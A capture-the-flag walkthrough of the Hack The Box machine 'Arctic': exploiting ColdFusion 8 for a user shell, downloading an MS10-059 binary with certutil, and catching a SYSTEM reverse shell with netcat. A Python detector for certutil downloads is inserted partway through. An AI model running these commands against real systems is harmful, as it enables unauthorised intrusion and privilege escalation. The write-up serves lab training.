Arctic HTB

IP

10.10.10.11

Nmap

sudo nmap -sV -sC -A -oA nmap/results 10.10.10.11

we can see the following open ports

135: RPC

8500: FMTP (Flight Message Transfer Protocol), a quite old service

49164: RPC

we can use port 8500 to access a web page

as we manually navigate through the directories (by the way, a very slow web page) we come across something interesting

http://10.10.10.11:8500/CFIDE/administrator

from this, we can tell the application runs

  • ADOBE COLDFUSION 8

using basic credentials doesn't work, but when we catch a request in Burp we find some funky parameters

let's search for an exploit

searchsploit coldfusion

we can copy it into our working directory

searchsploit -m cfm/webapps/50057.py

we need to modify the script and add our host IP and port, and the target machine IP

Now we can run the exploit

python3 50057.py

then we get a shell as tolis

Privilege Escalation via tolis

Let's gather some information on the machine

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Nothing interesting with users and groups

What we can do is gather system information and run it through a tool such as wes-ng to see if we can find an exploit to elevate our privileges

First, let's clone wes-ng onto our local machine

git clone https://github.com/bitsadmin/wesng.git

from our target machine, run

systeminfo

Now we can copy and paste the output into a file on our local machine called systeminfo.txt

to use wes-ng we first need to update its database in the directory we are working in

sudo python3 /opt/wesng/wes.py --update

running wes against our systeminfo.txt

sudo python3 /opt/wesng/wes.py systeminfo.txt

from the output of wes we can determine that we can use MS10-059

first, we need to clone the following repo onto our local machine; keep in mind this repo is quite large and you can clone just the single MS10-059 exploit

git clone https://github.com/SecWiki/windows-kernel-exploits.git

let's copy MS10-059 into our working directory

cp /home/kali/Desktop/arctic/windows-kernel-exploits/MS10-059/MS10-059.exe ./

let's start a python3 web server

python3 -m http.server 8888

from our target machine we want to download the exploit; we can use certutil for this

certutil -urlcache -split -f "http://10.10.16.4:8888/MS10-059.exe"

we should now have MS10-059.exe on our target machine
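The certutil download above is also what a defender should be watching for: `certutil -urlcache` with a remote URL is a well-known living-off-the-land download pattern. The following is an added example, not part of the original write-up, that flags it in process-creation logs; the log format (`<timestamp> <user> <command line>`) and the sample lines are constructed for this example.

```python
import re

# Constructed sample process-creation log lines, format "<timestamp> <user> <command line>".
# The first and third mimic the download step in the write-up; the others are benign.
SAMPLE_LOGS = [
    '2024-01-01T10:00:01 tolis certutil -urlcache -split -f "http://10.10.16.4:8888/MS10-059.exe"',
    '2024-01-01T10:00:05 tolis certutil -hashfile C:\\Windows\\notepad.exe SHA256',
    '2024-01-01T10:00:09 SYSTEM C:\\Windows\\System32\\certutil.exe -URLCache -f http://10.10.16.4:8888/x.exe out.exe',
    '2024-01-01T10:00:12 tolis systeminfo',
]

URL_RE = re.compile(r'^https?://', re.IGNORECASE)


def parse_log_line(line):
    """Split a constructed log line into its timestamp, user and command line."""
    ts, user, cmd = line.split(' ', 2)
    return {'ts': ts, 'user': user, 'cmd': cmd}


def is_certutil_download(cmdline):
    """True when certutil is invoked with -urlcache (or /urlcache) and a remote URL.

    Matching is case-insensitive and accepts a full path to certutil.exe,
    because both variations appear in real command lines.
    """
    tokens = [t.strip('"\'') for t in cmdline.split()]
    if not tokens:
        return False
    prog = tokens[0].lower().rsplit('\\', 1)[-1]
    if prog not in ('certutil', 'certutil.exe'):
        return False
    switches = {t.lower().lstrip('-/') for t in tokens[1:] if t and t[0] in '-/'}
    if 'urlcache' not in switches:
        return False
    return any(URL_RE.match(t) for t in tokens[1:])


def find_certutil_downloads(lines):
    """Return the parsed records of every line that matches the download pattern."""
    return [rec for rec in map(parse_log_line, lines) if is_certutil_download(rec['cmd'])]


if __name__ == '__main__':
    for hit in find_certutil_downloads(SAMPLE_LOGS):
        print(f"{hit['ts']} user={hit['user']} certutil download: {hit['cmd']}")
```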

on our local machine let's start a Netcat listener with rlwrap

  • what does rlwrap do: it provides readline's line editing, persistent history and completion, which gives us a more complete and stable shell

rlwrap nc -lvnp 443

Now let's run our exploit

MS10-059.exe 10.10.16.4 443

we now have a shell as nt authority\system
